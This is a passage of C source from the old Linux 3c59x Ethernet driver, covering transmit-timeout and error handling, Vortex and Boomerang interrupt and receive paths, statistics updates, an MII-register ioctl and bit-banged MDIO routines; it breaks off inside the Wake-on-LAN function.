*/ { /* * AKPM: block interrupts because vortex_interrupt * does a bare spin_lock() */ unsigned long flags; local_irq_save(flags); if (vp->full_bus_master_tx) boomerang_interrupt(dev->irq, dev, 0); else vortex_interrupt(dev->irq, dev, 0); local_irq_restore(flags); } } if (vortex_debug > 1) dump_tx_ring(dev); wait_for_completion(dev, TxReset); vp->stats.tx_errors++; if (vp->full_bus_master_tx) { if (vortex_debug > 0) printk(KERN_DEBUG "%s: Resetting the Tx ring pointer.\n", dev->name); if (vp->cur_tx - vp->dirty_tx > 0 && inl(ioaddr + DownListPtr) == 0) outl(vp->tx_ring_dma + (vp->dirty_tx % TX_RING_SIZE) * sizeof(struct boom_tx_desc), ioaddr + DownListPtr); if (vp->tx_full && (vp->cur_tx - vp->dirty_tx <= TX_RING_SIZE - 1)) { vp->tx_full = 0; netif_wake_queue (dev); } if (vp->tx_full) netif_stop_queue (dev); outb(PKT_BUF_SZ>>8, ioaddr + TxFreeThreshold); outw(DownUnstall, ioaddr + EL3_CMD); } else vp->stats.tx_dropped++; /* Issue Tx Enable */ outw(TxEnable, ioaddr + EL3_CMD); dev->trans_start = jiffies; /* Switch to register set 7 for normal use. */ EL3WINDOW(7); } /* * Handle uncommon interrupt sources. This is a separate routine to minimize * the cache impact. */ static void vortex_error(struct net_device *dev, int status) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; int do_tx_reset = 0; unsigned char tx_status = 0; if (vortex_debug > 2) { printk(KERN_DEBUG "%s: vortex_error(), status=0x%x\n", dev->name, status); } if (status & TxComplete) { /* Really "TxError" for us. */ tx_status = inb(ioaddr + TxStatus); /* Presumably a tx-timeout. We must merely re-enable. 
*/ if (vortex_debug > 2 || (tx_status != 0x88 && vortex_debug > 0)) { printk(KERN_DEBUG"%s: Transmit error, Tx status register %2.2x.\n", dev->name, tx_status); dump_tx_ring(dev); } if (tx_status & 0x14) vp->stats.tx_fifo_errors++; if (tx_status & 0x38) vp->stats.tx_aborted_errors++; outb(0, ioaddr + TxStatus); if (tx_status & 0x38) /* AKPM: tx reset after 16 collisions, despite what the manual says */ do_tx_reset = 1; else /* Merely re-enable the transmitter. */ outw(TxEnable, ioaddr + EL3_CMD); } if (status & RxEarly) { /* Rx early is unused. */ vortex_rx(dev); outw(AckIntr | RxEarly, ioaddr + EL3_CMD); } if (status & StatsFull) { /* Empty statistics. */ static int DoneDidThat = 0; if (vortex_debug > 4) printk(KERN_DEBUG "%s: Updating stats.\n", dev->name); update_stats(ioaddr, dev); /* HACK: Disable statistics as an interrupt source. */ /* This occurs when we have the wrong media type! */ if (DoneDidThat == 0 && inw(ioaddr + EL3_STATUS) & StatsFull) { printk(KERN_WARNING "%s: Updating statistics failed, disabling " "stats as an interrupt source.\n", dev->name); EL3WINDOW(5); outw(SetIntrEnb | (inw(ioaddr + 10) & ~StatsFull), ioaddr + EL3_CMD); vp->intr_enable &= ~StatsFull; EL3WINDOW(7); DoneDidThat++; } } if (status & IntReq) { /* Restore all interrupt sources. */ outw(vp->status_enable, ioaddr + EL3_CMD); outw(vp->intr_enable, ioaddr + EL3_CMD); } if (status & HostError) { u16 fifo_diag; EL3WINDOW(4); fifo_diag = inw(ioaddr + Wn4_FIFODiag); printk(KERN_ERR "%s: Host error, FIFO diagnostic register %4.4x.\n", dev->name, fifo_diag); /* Adapter failure requires Tx/Rx reset and reinit. */ if (vp->full_bus_master_tx) { /* In this case, blow the card away */ vortex_down(dev); wait_for_completion(dev, TotalReset | 0xff); vortex_up(dev); } else if (fifo_diag & 0x0400) do_tx_reset = 1; if (fifo_diag & 0x3000) { wait_for_completion(dev, RxReset); /* Set the Rx filter to the current state. */ set_rx_mode(dev); outw(RxEnable, ioaddr + EL3_CMD); /* Re-enable the receiver. 
*/ outw(AckIntr | HostError, ioaddr + EL3_CMD); } } /* * Black magic. If we're resetting the transmitter, remember the current downlist * pointer and restore it afterwards. We can't use cur_tx because that could * lag the actual hardware index. */ if (do_tx_reset) { if (vp->full_bus_master_tx) { unsigned long old_down_list_ptr; wait_for_completion(dev, DownStall); old_down_list_ptr = inl(ioaddr + DownListPtr); wait_for_completion(dev, TxReset); outw(TxEnable, ioaddr + EL3_CMD); /* Restart DMA if necessary */ outl(old_down_list_ptr, ioaddr + DownListPtr); if (vortex_debug > 2) printk(KERN_DEBUG "reset DMA to 0x%08x\n", inl(ioaddr + DownListPtr)); outw(DownUnstall, ioaddr + EL3_CMD); /* * Here we make a single attempt to prevent a timeout by * restarting the timer if we think that the ISR has a good * chance of unjamming things. */ if (vp->tx_reset_resume == 0 && vp->tx_full) { vp->tx_reset_resume = 1; dev->trans_start = jiffies; } } else { wait_for_completion(dev, TxReset); outw(TxEnable, ioaddr + EL3_CMD); } } } static int vortex_start_xmit(struct sk_buff *skb, struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; /* Put out the doubleword header... */ outl(skb->len, ioaddr + TX_FIFO); if (vp->bus_master) { /* Set the bus-master controller to transfer the packet. */ int len = (skb->len + 3) & ~3; outl( vp->tx_skb_dma = pci_map_single(vp->pdev, skb->data, len, PCI_DMA_TODEVICE), ioaddr + Wn7_MasterAddr); outw(len, ioaddr + Wn7_MasterLen); vp->tx_skb = skb; outw(StartDMADown, ioaddr + EL3_CMD); /* netif_wake_queue() will be called at the DMADone interrupt. */ } else { /* ... and the packet rounded to a doubleword. */ outsl(ioaddr + TX_FIFO, skb->data, (skb->len + 3) >> 2); dev_kfree_skb (skb); if (inw(ioaddr + TxFree) > 1536) { netif_start_queue (dev); /* AKPM: redundant? */ } else { /* Interrupt us when the FIFO has room for max-sized packet.
*/ netif_stop_queue(dev); outw(SetTxThreshold + (1536>>2), ioaddr + EL3_CMD); } } dev->trans_start = jiffies; /* Clear the Tx status stack. */ { int tx_status; int i = 32; while (--i > 0 && (tx_status = inb(ioaddr + TxStatus)) > 0) { if (tx_status & 0x3C) { /* A Tx-disabling error occurred. */ if (vortex_debug > 2) printk(KERN_DEBUG "%s: Tx error, status %2.2x.\n", dev->name, tx_status); if (tx_status & 0x04) vp->stats.tx_fifo_errors++; if (tx_status & 0x38) vp->stats.tx_aborted_errors++; if (tx_status & 0x30) { wait_for_completion(dev, TxReset); } outw(TxEnable, ioaddr + EL3_CMD); } outb(0x00, ioaddr + TxStatus); /* Pop the status stack. */ } } return 0; } static int boomerang_start_xmit(struct sk_buff *skb, struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; /* Calculate the next Tx descriptor entry. */ int entry = vp->cur_tx % TX_RING_SIZE; struct boom_tx_desc *prev_entry = &vp->tx_ring[(vp->cur_tx-1) % TX_RING_SIZE]; unsigned long flags; if (vortex_debug > 6) printk(KERN_DEBUG "boomerang_start_xmit()\n"); if (vortex_debug > 3) printk(KERN_DEBUG "%s: Trying to send a packet, Tx index %d.\n", dev->name, vp->cur_tx); if (vp->tx_full) { if (vortex_debug > 0) printk(KERN_WARNING "%s: Tx Ring full, refusing to send buffer.\n", dev->name); return 1; } vp->tx_skbuff[entry] = skb; vp->tx_ring[entry].next = 0; vp->tx_ring[entry].addr = cpu_to_le32(pci_map_single(vp->pdev, skb->data, skb->len, PCI_DMA_TODEVICE)); vp->tx_ring[entry].length = cpu_to_le32(skb->len | LAST_FRAG); vp->tx_ring[entry].status = cpu_to_le32(skb->len | TxIntrUploaded); spin_lock_irqsave(&vp->lock, flags); /* Wait for the stall to complete. 
*/ wait_for_completion(dev, DownStall); prev_entry->next = cpu_to_le32(vp->tx_ring_dma + entry * sizeof(struct boom_tx_desc)); if (inl(ioaddr + DownListPtr) == 0) { outl(vp->tx_ring_dma + entry * sizeof(struct boom_tx_desc), ioaddr + DownListPtr); queued_packet++; } vp->cur_tx++; if (vp->cur_tx - vp->dirty_tx > TX_RING_SIZE - 1) { vp->tx_full = 1; netif_stop_queue (dev); } else { /* Clear previous interrupt enable. */ #if defined(tx_interrupt_mitigation) prev_entry->status &= cpu_to_le32(~TxIntrUploaded); #endif /* netif_start_queue (dev); */ /* AKPM: redundant? */ } outw(DownUnstall, ioaddr + EL3_CMD); vp->tx_reset_resume = 0; spin_unlock_irqrestore(&vp->lock, flags); dev->trans_start = jiffies; return 0; } /* The interrupt handler does all of the Rx thread work and cleans up after the Tx thread. */ /* * This is the ISR for the vortex series chips. * full_bus_master_tx == 0 && full_bus_master_rx == 0 */ static void vortex_interrupt(int irq, void *dev_id, struct pt_regs *regs) { struct net_device *dev = dev_id; struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr; int status; int work_done = max_interrupt_work; spin_lock(&vp->lock); ioaddr = dev->base_addr; status = inw(ioaddr + EL3_STATUS); if (vortex_debug > 6) printk("vortex_interrupt(). status=0x%4x\n", status); if (status & IntReq) { status |= vp->deferred; vp->deferred = 0; } if (status == 0xffff) /* AKPM: h/w no longer present (hotplug)? */ goto handler_exit; if (vortex_debug > 4) printk(KERN_DEBUG "%s: interrupt, status %4.4x, latency %d ticks.\n", dev->name, status, inb(ioaddr + Timer)); do { if (vortex_debug > 5) printk(KERN_DEBUG "%s: In interrupt loop, status %4.4x.\n", dev->name, status); if (status & RxComplete) vortex_rx(dev); if (status & TxAvailable) { if (vortex_debug > 5) printk(KERN_DEBUG " TX room bit was handled.\n"); /* There's room in the FIFO for a full-sized packet. 
*/ outw(AckIntr | TxAvailable, ioaddr + EL3_CMD); netif_wake_queue (dev); } if (status & DMADone) { if (inw(ioaddr + Wn7_MasterStatus) & 0x1000) { outw(0x1000, ioaddr + Wn7_MasterStatus); /* Ack the event. */ pci_unmap_single(vp->pdev, vp->tx_skb_dma, (vp->tx_skb->len + 3) & ~3, PCI_DMA_TODEVICE); dev_kfree_skb_irq(vp->tx_skb); /* Release the transferred buffer */ if (inw(ioaddr + TxFree) > 1536) { /* * AKPM: FIXME: I don't think we need this. If the queue was stopped due to * insufficient FIFO room, the TxAvailable test will succeed and call * netif_wake_queue() */ netif_wake_queue(dev); } else { /* Interrupt when FIFO has room for max-sized packet. */ outw(SetTxThreshold + (1536>>2), ioaddr + EL3_CMD); netif_stop_queue(dev); /* AKPM: This is new */ } } } /* Check for all uncommon interrupts at once. */ if (status & (HostError | RxEarly | StatsFull | TxComplete | IntReq)) { if (status == 0xffff) break; vortex_error(dev, status); } if (--work_done < 0) { printk(KERN_WARNING "%s: Too much work in interrupt, status " "%4.4x.\n", dev->name, status); /* Disable all pending interrupts. */ do { vp->deferred |= status; outw(SetStatusEnb | (~vp->deferred & vp->status_enable), ioaddr + EL3_CMD); outw(AckIntr | (vp->deferred & 0x7ff), ioaddr + EL3_CMD); } while ((status = inw(ioaddr + EL3_CMD)) & IntLatch); /* The timer will reenable interrupts. */ mod_timer(&vp->timer, jiffies + 1*HZ); break; } /* Acknowledge the IRQ. */ outw(AckIntr | IntReq | IntLatch, ioaddr + EL3_CMD); if (vp->cb_fn_base) /* The PCMCIA people are idiots. */ writel(0x8000, vp->cb_fn_base + 4); } while ((status = inw(ioaddr + EL3_STATUS)) & (IntLatch | RxComplete)); if (vortex_debug > 4) printk(KERN_DEBUG "%s: exiting interrupt, status %4.4x.\n", dev->name, status); handler_exit: spin_unlock(&vp->lock); } /* * This is the ISR for the boomerang series chips. 
* full_bus_master_tx == 1 && full_bus_master_rx == 1 */ static void boomerang_interrupt(int irq, void *dev_id, struct pt_regs *regs) { struct net_device *dev = dev_id; struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr; int status; int work_done = max_interrupt_work; spin_lock(&vp->lock); ioaddr = dev->base_addr; status = inw(ioaddr + EL3_STATUS); if (vortex_debug > 6) printk(KERN_DEBUG "boomerang_interrupt. status=0x%4x\n", status); if (status == 0xffff) { /* AKPM: h/w no longer present (hotplug)? */ if (vortex_debug > 1) printk(KERN_DEBUG "boomerang_interrupt(1): status = 0xffff\n"); goto handler_exit; } if (status & IntReq) { status |= vp->deferred; vp->deferred = 0; } if (vortex_debug > 4) printk(KERN_DEBUG "%s: interrupt, status %4.4x, latency %d ticks.\n", dev->name, status, inb(ioaddr + Timer)); do { if (vortex_debug > 5) printk(KERN_DEBUG "%s: In interrupt loop, status %4.4x.\n", dev->name, status); if (status & UpComplete) { outw(AckIntr | UpComplete, ioaddr + EL3_CMD); if (vortex_debug > 5) printk(KERN_DEBUG "boomerang_interrupt->boomerang_rx\n"); boomerang_rx(dev); } if (status & DownComplete) { unsigned int dirty_tx = vp->dirty_tx; outw(AckIntr | DownComplete, ioaddr + EL3_CMD); while (vp->cur_tx - dirty_tx > 0) { int entry = dirty_tx % TX_RING_SIZE; if (inl(ioaddr + DownListPtr) == vp->tx_ring_dma + entry * sizeof(struct boom_tx_desc)) break; /* It still hasn't been processed. */ if (vp->tx_skbuff[entry]) { struct sk_buff *skb = vp->tx_skbuff[entry]; pci_unmap_single(vp->pdev, le32_to_cpu(vp->tx_ring[entry].addr), skb->len, PCI_DMA_TODEVICE); dev_kfree_skb_irq(skb); vp->tx_skbuff[entry] = 0; } else { printk(KERN_DEBUG "boomerang_interrupt: no skb!\n"); } /* vp->stats.tx_packets++; Counted below. 
*/ dirty_tx++; } vp->dirty_tx = dirty_tx; if (vp->tx_full && (vp->cur_tx - dirty_tx <= TX_RING_SIZE - 1)) { if (vortex_debug > 6) printk(KERN_DEBUG "boomerang_interrupt: clearing tx_full\n"); vp->tx_full = 0; netif_wake_queue (dev); } } if (vp->tx_full) netif_stop_queue (dev); /* Check for all uncommon interrupts at once. */ if (status & (HostError | RxEarly | StatsFull | TxComplete | IntReq)) vortex_error(dev, status); if (--work_done < 0) { printk(KERN_WARNING "%s: Too much work in interrupt, status " "%4.4x.\n", dev->name, status); /* Disable all pending interrupts. */ do { vp->deferred |= status; outw(SetStatusEnb | (~vp->deferred & vp->status_enable), ioaddr + EL3_CMD); outw(AckIntr | (vp->deferred & 0x7ff), ioaddr + EL3_CMD); } while ((status = inw(ioaddr + EL3_CMD)) & IntLatch); /* The timer will reenable interrupts. */ mod_timer(&vp->timer, jiffies + 1*HZ); break; } /* Acknowledge the IRQ. */ outw(AckIntr | IntReq | IntLatch, ioaddr + EL3_CMD); if (vp->cb_fn_base) /* The PCMCIA people are idiots. */ writel(0x8000, vp->cb_fn_base + 4); } while ((status = inw(ioaddr + EL3_STATUS)) & (IntLatch | RxComplete)); if (vortex_debug > 4) printk(KERN_DEBUG "%s: exiting interrupt, status %4.4x.\n", dev->name, status); handler_exit: spin_unlock(&vp->lock); } static int vortex_rx(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; int i; short rx_status; if (vortex_debug > 5) printk(KERN_DEBUG "vortex_rx(): status %4.4x, rx_status %4.4x.\n", inw(ioaddr+EL3_STATUS), inw(ioaddr+RxStatus)); while ((rx_status = inw(ioaddr + RxStatus)) > 0) { if (rx_status & 0x4000) { /* Error, update stats. 
*/ unsigned char rx_error = inb(ioaddr + RxErrors); if (vortex_debug > 2) printk(KERN_DEBUG " Rx error: status %2.2x.\n", rx_error); vp->stats.rx_errors++; if (rx_error & 0x01) vp->stats.rx_over_errors++; if (rx_error & 0x02) vp->stats.rx_length_errors++; if (rx_error & 0x04) vp->stats.rx_frame_errors++; if (rx_error & 0x08) vp->stats.rx_crc_errors++; if (rx_error & 0x10) vp->stats.rx_length_errors++; } else { /* The packet length: up to 4.5K!. */ int pkt_len = rx_status & 0x1fff; struct sk_buff *skb; skb = dev_alloc_skb(pkt_len + 5); if (vortex_debug > 4) printk(KERN_DEBUG "Receiving packet size %d status %4.4x.\n", pkt_len, rx_status); if (skb != NULL) { skb->dev = dev; skb_reserve(skb, 2); /* Align IP on 16 byte boundaries */ /* 'skb_put()' points to the start of sk_buff data area. */ if (vp->bus_master && ! (inw(ioaddr + Wn7_MasterStatus) & 0x8000)) { dma_addr_t dma = pci_map_single(vp->pdev, skb_put(skb, pkt_len), pkt_len, PCI_DMA_FROMDEVICE); outl(dma, ioaddr + Wn7_MasterAddr); outw((skb->len + 3) & ~3, ioaddr + Wn7_MasterLen); outw(StartDMAUp, ioaddr + EL3_CMD); while (inw(ioaddr + Wn7_MasterStatus) & 0x8000) ; pci_unmap_single(vp->pdev, dma, pkt_len, PCI_DMA_FROMDEVICE); } else { insl(ioaddr + RX_FIFO, skb_put(skb, pkt_len), (pkt_len + 3) >> 2); } outw(RxDiscard, ioaddr + EL3_CMD); /* Pop top Rx packet. */ skb->protocol = eth_type_trans(skb, dev); netif_rx(skb); dev->last_rx = jiffies; vp->stats.rx_packets++; /* Wait a limited time to go to next packet. */ for (i = 200; i >= 0; i--) if ( ! 
(inw(ioaddr + EL3_STATUS) & CmdInProgress)) break; continue; } else if (vortex_debug > 0) printk(KERN_NOTICE "%s: No memory to allocate a sk_buff of " "size %d.\n", dev->name, pkt_len); } vp->stats.rx_dropped++; wait_for_completion(dev, RxDiscard); } return 0; } static int boomerang_rx(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; int entry = vp->cur_rx % RX_RING_SIZE; long ioaddr = dev->base_addr; int rx_status; int rx_work_limit = vp->dirty_rx + RX_RING_SIZE - vp->cur_rx; if (vortex_debug > 5) printk(KERN_DEBUG "boomerang_rx(): status %4.4x\n", inw(ioaddr+EL3_STATUS)); while ((rx_status = le32_to_cpu(vp->rx_ring[entry].status)) & RxDComplete){ if (--rx_work_limit < 0) break; if (rx_status & RxDError) { /* Error, update stats. */ unsigned char rx_error = rx_status >> 16; if (vortex_debug > 2) printk(KERN_DEBUG " Rx error: status %2.2x.\n", rx_error); vp->stats.rx_errors++; if (rx_error & 0x01) vp->stats.rx_over_errors++; if (rx_error & 0x02) vp->stats.rx_length_errors++; if (rx_error & 0x04) vp->stats.rx_frame_errors++; if (rx_error & 0x08) vp->stats.rx_crc_errors++; if (rx_error & 0x10) vp->stats.rx_length_errors++; } else { /* The packet length: up to 4.5K!. */ int pkt_len = rx_status & 0x1fff; struct sk_buff *skb; dma_addr_t dma = le32_to_cpu(vp->rx_ring[entry].addr); vp->stats.rx_bytes += pkt_len; if (vortex_debug > 4) printk(KERN_DEBUG "Receiving packet size %d status %4.4x.\n", pkt_len, rx_status); /* Check if the packet is long enough to just accept without copying to a properly sized skbuff. */ if (pkt_len < rx_copybreak && (skb = dev_alloc_skb(pkt_len + 2)) != 0) { skb->dev = dev; skb_reserve(skb, 2); /* Align IP on 16 byte boundaries */ pci_dma_sync_single(vp->pdev, dma, PKT_BUF_SZ, PCI_DMA_FROMDEVICE); /* 'skb_put()' points to the start of sk_buff data area. */ memcpy(skb_put(skb, pkt_len), vp->rx_skbuff[entry]->tail, pkt_len); rx_copy++; } else { /* Pass up the skbuff already on the Rx ring. 
*/ skb = vp->rx_skbuff[entry]; vp->rx_skbuff[entry] = NULL; skb_put(skb, pkt_len); pci_unmap_single(vp->pdev, dma, PKT_BUF_SZ, PCI_DMA_FROMDEVICE); rx_nocopy++; } skb->protocol = eth_type_trans(skb, dev); { /* Use hardware checksum info. */ int csum_bits = rx_status & 0xee000000; if (csum_bits && (csum_bits == (IPChksumValid | TCPChksumValid) || csum_bits == (IPChksumValid | UDPChksumValid))) { skb->ip_summed = CHECKSUM_UNNECESSARY; rx_csumhits++; } } netif_rx(skb); dev->last_rx = jiffies; vp->stats.rx_packets++; } entry = (++vp->cur_rx) % RX_RING_SIZE; } /* Refill the Rx ring buffers. */ for (; vp->dirty_rx < vp->cur_rx; vp->dirty_rx++) { struct sk_buff *skb; entry = vp->dirty_rx % RX_RING_SIZE; if (vp->rx_skbuff[entry] == NULL) { skb = dev_alloc_skb(PKT_BUF_SZ); if (skb == NULL) break; /* Bad news! */ skb->dev = dev; /* Mark as being used by this device. */ skb_reserve(skb, 2); /* Align IP on 16 byte boundaries */ vp->rx_ring[entry].addr = cpu_to_le32(pci_map_single(vp->pdev, skb->tail, PKT_BUF_SZ, PCI_DMA_FROMDEVICE)); vp->rx_skbuff[entry] = skb; } vp->rx_ring[entry].status = 0; /* Clear complete bit. */ outw(UpUnstall, ioaddr + EL3_CMD); } return 0; } static void vortex_down(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; netif_stop_queue (dev); del_timer(&vp->timer); /* Turn off statistics ASAP. We update vp->stats below. */ outw(StatsDisable, ioaddr + EL3_CMD); /* Disable the receiver and transmitter. */ outw(RxDisable, ioaddr + EL3_CMD); outw(TxDisable, ioaddr + EL3_CMD); if (dev->if_port == XCVR_10base2) /* Turn off thinnet power. Green! 
*/ outw(StopCoax, ioaddr + EL3_CMD); outw(SetIntrEnb | 0x0000, ioaddr + EL3_CMD); update_stats(ioaddr, dev); if (vp->full_bus_master_rx) outl(0, ioaddr + UpListPtr); if (vp->full_bus_master_tx) outl(0, ioaddr + DownListPtr); if (vp->capabilities & CapPwrMgmt) acpi_set_WOL(dev); } static int vortex_close(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; int i; if (netif_device_present(dev)) vortex_down(dev); if (vortex_debug > 1) { printk(KERN_DEBUG"%s: vortex_close() status %4.4x, Tx status %2.2x.\n", dev->name, inw(ioaddr + EL3_STATUS), inb(ioaddr + TxStatus)); printk(KERN_DEBUG "%s: vortex close stats: rx_nocopy %d rx_copy %d" " tx_queued %d Rx pre-checksummed %d.\n", dev->name, rx_nocopy, rx_copy, queued_packet, rx_csumhits); } free_irq(dev->irq, dev); if (vp->full_bus_master_rx) { /* Free Boomerang bus master Rx buffers. */ for (i = 0; i < RX_RING_SIZE; i++) if (vp->rx_skbuff[i]) { pci_unmap_single( vp->pdev, le32_to_cpu(vp->rx_ring[i].addr), PKT_BUF_SZ, PCI_DMA_FROMDEVICE); dev_kfree_skb(vp->rx_skbuff[i]); vp->rx_skbuff[i] = 0; } } if (vp->full_bus_master_tx) { /* Free Boomerang bus master Tx buffers. */ for (i = 0; i < TX_RING_SIZE; i++) if (vp->tx_skbuff[i]) { struct sk_buff *skb = vp->tx_skbuff[i]; pci_unmap_single(vp->pdev, le32_to_cpu(vp->tx_ring[i].addr), skb->len, PCI_DMA_TODEVICE); dev_kfree_skb(skb); vp->tx_skbuff[i] = 0; } } MOD_DEC_USE_COUNT; vp->open = 0; return 0; } static void dump_tx_ring(struct net_device *dev) { if (vortex_debug > 0) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; if (vp->full_bus_master_tx) { int i; int stalled = inl(ioaddr + PktStatus) & 0x04; /* Possibly racy.
But it's only debug stuff */ wait_for_completion(dev, DownStall); printk(KERN_DEBUG " Flags; bus-master %d, full %d; dirty %d(%d) " "current %d(%d).\n", vp->full_bus_master_tx, vp->tx_full, vp->dirty_tx, vp->dirty_tx % TX_RING_SIZE, vp->cur_tx, vp->cur_tx % TX_RING_SIZE); printk(KERN_DEBUG " Transmit list %8.8x vs. %p.\n", inl(ioaddr + DownListPtr), &vp->tx_ring[vp->dirty_tx % TX_RING_SIZE]); for (i = 0; i < TX_RING_SIZE; i++) { printk(KERN_DEBUG " %d: @%p length %8.8x status %8.8x\n", i, &vp->tx_ring[i], le32_to_cpu(vp->tx_ring[i].length), le32_to_cpu(vp->tx_ring[i].status)); } if (!stalled) outw(DownUnstall, ioaddr + EL3_CMD); } } } static struct net_device_stats *vortex_get_stats(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; unsigned long flags; if (netif_device_present(dev)) { /* AKPM: Used to be netif_running */ spin_lock_irqsave (&vp->lock, flags); update_stats(dev->base_addr, dev); spin_unlock_irqrestore (&vp->lock, flags); } return &vp->stats; } /* Update statistics. Unlike with the EL3 we need not worry about interrupts changing the window setting from underneath us, but we must still guard against a race condition with a StatsUpdate interrupt updating the table. This is done by checking that the ASM (!) code generated uses atomic updates with '+='. */ static void update_stats(long ioaddr, struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; int old_window = inw(ioaddr + EL3_CMD); if (old_window == 0xffff) /* Chip suspended or ejected. */ return; /* Unlike the 3c5x9 we need not turn off stats updates while reading. */ /* Switch to the stats window, and read everything. */ EL3WINDOW(6); vp->stats.tx_carrier_errors += inb(ioaddr + 0); vp->stats.tx_heartbeat_errors += inb(ioaddr + 1); /* Multiple collisions. 
*/ inb(ioaddr + 2); vp->stats.collisions += inb(ioaddr + 3); vp->stats.tx_window_errors += inb(ioaddr + 4); vp->stats.rx_fifo_errors += inb(ioaddr + 5); vp->stats.tx_packets += inb(ioaddr + 6); vp->stats.tx_packets += (inb(ioaddr + 9)&0x30) << 4; /* Rx packets */ inb(ioaddr + 7); /* Must read to clear */ /* Tx deferrals */ inb(ioaddr + 8); /* Don't bother with register 9, an extension of registers 6&7. If we do use the 6&7 values the atomic update assumption above is invalid. */ vp->stats.rx_bytes += inw(ioaddr + 10); vp->stats.tx_bytes += inw(ioaddr + 12); /* New: On the Vortex we must also clear the BadSSD counter. */ EL3WINDOW(4); inb(ioaddr + 12); { u8 up = inb(ioaddr + 13); vp->stats.rx_bytes += (up & 0x0f) << 16; vp->stats.tx_bytes += (up & 0xf0) << 12; } /* We change back to window 7 (not 1) with the Vortex. */ /* AKPM: the previous comment is obsolete - we switch back to the old window */ EL3WINDOW(old_window >> 13); return; } static int vortex_ioctl(struct net_device *dev, struct ifreq *rq, int cmd) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; u16 *data = (u16 *)&rq->ifr_data; int phy = vp->phys[0] & 0x1f; int retval; unsigned long flags; spin_lock_irqsave(&vp->lock, flags); switch(cmd) { case SIOCDEVPRIVATE: /* Get the address of the PHY in use. */ data[0] = phy; case SIOCDEVPRIVATE+1: /* Read the specified MII register. */ EL3WINDOW(4); data[3] = mdio_read(ioaddr, data[0] & 0x1f, data[1] & 0x1f); retval = 0; break; case SIOCDEVPRIVATE+2: /* Write the specified MII register */ if (!capable(CAP_NET_ADMIN)) { retval = -EPERM; } else { EL3WINDOW(4); mdio_write(ioaddr, data[0] & 0x1f, data[1] & 0x1f, data[2]); retval = 0; } break; default: retval = -EOPNOTSUPP; break; } spin_unlock_irqrestore(&vp->lock, flags); return retval; } /* Pre-Cyclone chips have no documented multicast filter, so the only multicast setting is to receive all multicast frames. 
At least the chip has a very clean way to set the mode, unlike many others. */ static void set_rx_mode(struct net_device *dev) { long ioaddr = dev->base_addr; int new_mode; if (dev->flags & IFF_PROMISC) { if (vortex_debug > 0) printk(KERN_NOTICE "%s: Setting promiscuous mode.\n", dev->name); new_mode = SetRxFilter|RxStation|RxMulticast|RxBroadcast|RxProm; } else if ((dev->mc_list) || (dev->flags & IFF_ALLMULTI)) { new_mode = SetRxFilter|RxStation|RxMulticast|RxBroadcast; } else new_mode = SetRxFilter | RxStation | RxBroadcast; outw(new_mode, ioaddr + EL3_CMD); } /* MII transceiver control section. Read and write the MII registers using software-generated serial MDIO protocol. See the MII specifications or DP83840A data sheet for details. */ /* The maximum data clock rate is 2.5 MHz. The minimum timing is usually met by back-to-back PCI I/O cycles, but we insert a delay to avoid "overclocking" issues. */ #define mdio_delay() inl(mdio_addr) #define MDIO_SHIFT_CLK 0x01 #define MDIO_DIR_WRITE 0x04 #define MDIO_DATA_WRITE0 (0x00 | MDIO_DIR_WRITE) #define MDIO_DATA_WRITE1 (0x02 | MDIO_DIR_WRITE) #define MDIO_DATA_READ 0x02 #define MDIO_ENB_IN 0x00 /* Generate the preamble required for initial synchronization and a few older transceivers. */ static void mdio_sync(long ioaddr, int bits) { long mdio_addr = ioaddr + Wn4_PhysicalMgmt; /* Establish sync by sending at least 32 logic ones. */ while (-- bits >= 0) { outw(MDIO_DATA_WRITE1, mdio_addr); mdio_delay(); outw(MDIO_DATA_WRITE1 | MDIO_SHIFT_CLK, mdio_addr); mdio_delay(); } } static int mdio_read(long ioaddr, int phy_id, int location) { int i; int read_cmd = (0xf6 << 10) | (phy_id << 5) | location; unsigned int retval = 0; long mdio_addr = ioaddr + Wn4_PhysicalMgmt; if (mii_preamble_required) mdio_sync(ioaddr, 32); /* Shift the read command bits out. */ for (i = 14; i >= 0; i--) { int dataval = (read_cmd&(1<<i)) ? MDIO_DATA_WRITE1 : MDIO_DATA_WRITE0; outw(dataval, mdio_addr); mdio_delay(); outw(dataval | MDIO_SHIFT_CLK, mdio_addr); mdio_delay(); } /* Read the two transition, 16 data, and wire-idle bits. */ for (i = 19; i > 0; i--) { outw(MDIO_ENB_IN, mdio_addr); mdio_delay(); retval = (retval << 1) | ((inw(mdio_addr) & MDIO_DATA_READ) ?
1 : 0); outw(MDIO_ENB_IN | MDIO_SHIFT_CLK, mdio_addr); mdio_delay(); } return retval & 0x20000 ? 0xffff : retval>>1 & 0xffff; } static void mdio_write(long ioaddr, int phy_id, int location, int value) { int write_cmd = 0x50020000 | (phy_id << 23) | (location << 18) | value; long mdio_addr = ioaddr + Wn4_PhysicalMgmt; int i; if (mii_preamble_required) mdio_sync(ioaddr, 32); /* Shift the command bits out. */ for (i = 31; i >= 0; i--) { int dataval = (write_cmd&(1<<i)) ? MDIO_DATA_WRITE1 : MDIO_DATA_WRITE0; outw(dataval, mdio_addr); mdio_delay(); outw(dataval | MDIO_SHIFT_CLK, mdio_addr); mdio_delay(); } /* Leave the interface idle. */ for (i = 1; i >= 0; i--) { outw(MDIO_ENB_IN, mdio_addr); mdio_delay(); outw(MDIO_ENB_IN | MDIO_SHIFT_CLK, mdio_addr); mdio_delay(); } return; } /* ACPI: Advanced Configuration and Power Interface. */ /* Set Wake-On-LAN mode and put the board into D3 (power-down) state. */ static void acpi_set_WOL(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; /* AKPM: This kills the 905 */ if 